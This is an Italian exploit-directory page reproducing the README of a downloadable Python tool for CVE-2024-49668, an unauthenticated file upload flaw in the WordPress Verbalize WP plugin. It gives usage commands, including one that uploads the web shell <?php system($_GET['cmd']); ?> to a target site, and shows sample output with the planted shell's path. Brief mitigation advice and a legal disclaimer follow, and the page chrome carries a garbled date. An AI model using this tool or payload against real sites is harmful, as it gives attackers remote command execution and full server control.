Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-49668 — Plugin WordPress Verbalize WP <= 1.0 - Vulnerabilità di caricamento arbitrario di file | Kitploit
Strumenti/GitHubGitHub/nxploited/cve-2024-49668
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e Formazione
GitHubnxploited/cve-2024-49668

CVE-2024-49668

Plugin WordPress Verbalize WP <= 1.0 - Vulnerabilità di caricamento arbitrario di file

Vedi Repository
21 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

🚨 CVE-2024-49668: Vulnerabilità di Upload Arbitrario di File nel Plugin WordPress Verbalize WP

📋 Panoramica

CVE-2024-49668 è una vulnerabilità critica nel plugin WordPress Verbalize WP versione 1.0 e precedenti. Questa vulnerabilità consente ad attaccanti non autenticati di caricare file arbitrari, inclusi web shell, sul server web. Il problema deriva da una validazione insufficiente dell'input e da limitazioni deboli sui tipi di file durante il caricamento.

Dettagli

  • Pubblicata: 2024-10-23
  • Aggiornata: 2024-10-23
  • Titolo: Plugin WordPress Verbalize WP <= 1.0 - Vulnerabilità di Upload Arbitrario di File
  • Descrizione: Upload senza restrizioni di file con tipologia pericolosa in Admin Verbalize WP - Caricamento di una Web Shell su un Server Web. Questo problema riguarda Verbalize WP da n/d fino alla versione 1.0.
  • CWE: CWE-434: Upload senza Restrizioni di File con Tipologia Pericolosa
  • Punteggio CVSS: 10.0 (Critico)
  • Stringa del Vettore: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

🛠️ Script di Exploit

Questo script Python sfrutta la vulnerabilità CVE-2024-49668 per caricare un file shell sul sito WordPress target utilizzando il plugin Verbalize WP.

Funzionalità

  • Verifica Automatica della Vulnerabilità: Lo script verifica se il sito target è vulnerabile controllando la versione del plugin in readme.txt.
  • Caricamento File: Carica un file shell PHP sul sito target.
  • Estrazione del Percorso: Estrae e visualizza il percorso completo del file shell caricato.

🧰 Requisiti

  • Python 3.x
  • Libreria requests

Installa la libreria richiesta usando pip:

root@kitploit:~
pip install requests

🚀 Utilizzo

root@kitploit:~
usage: 
CVE-2024-49668.py [-h] -u URL [-s SHELL]

Esegue una richiesta POST a un sito WordPress.

options:
  -h, --help         mostra questo messaggio di aiuto ed esce
  -u, --url URL      URL del target
  -s, --shell SHELL  Codice shell da caricare

Esempio

Di default, lo script caricherà una shell PHP che esegue phpinfo().

root@kitploit:~
python CVE-2024-49668.py -u http://target.com

Puoi anche specificare un codice shell PHP personalizzato da caricare:

root@kitploit:~
python CVE-2024-49668.py -u http://target.com -s "<?php system($_GET['cmd']); ?>"

📄 Output dello Script

root@kitploit:~
The site is vulnerable. Exploiting version: 1.0. Uploading file...
Shell path: /wp-content/uploads/audio-text/4091/audio-demo.php
Exploit By: Nxploit, Khaled ALenazi

📚 Informazioni Aggiuntive

Impatto della Vulnerabilità

La vulnerabilità CVE-2024-49668 consente agli attaccanti di ottenere il pieno controllo del server target caricando file dannosi. Lo sfruttamento di questa vulnerabilità può portare a conseguenze gravi, tra cui violazione dei dati, accesso non autorizzato e potenziale deturpazione del sito web.

Best Practice per la Mitigazione

Per proteggere il tuo sito WordPress da questa vulnerabilità, si raccomanda di:

  • Aggiornare il plugin Verbalize WP all'ultima versione che risolve il problema.
  • Implementare validazioni robuste per il caricamento dei file, limitando tipi e dimensioni dei file.
  • Monitorare regolarmente i log del server per attività sospette.

Disclaimer Legale

Questo strumento è destinato esclusivamente a scopi educativi. L'uso non autorizzato di questo strumento contro siti web senza l'esplicita autorizzazione del proprietario è illegale. Gli autori non sono responsabili per qualsiasi uso improprio o danno causato da questo strumento.


Creato il 2025-03-22 da Nxploited , Khaled alenazi

Scarica lo strumento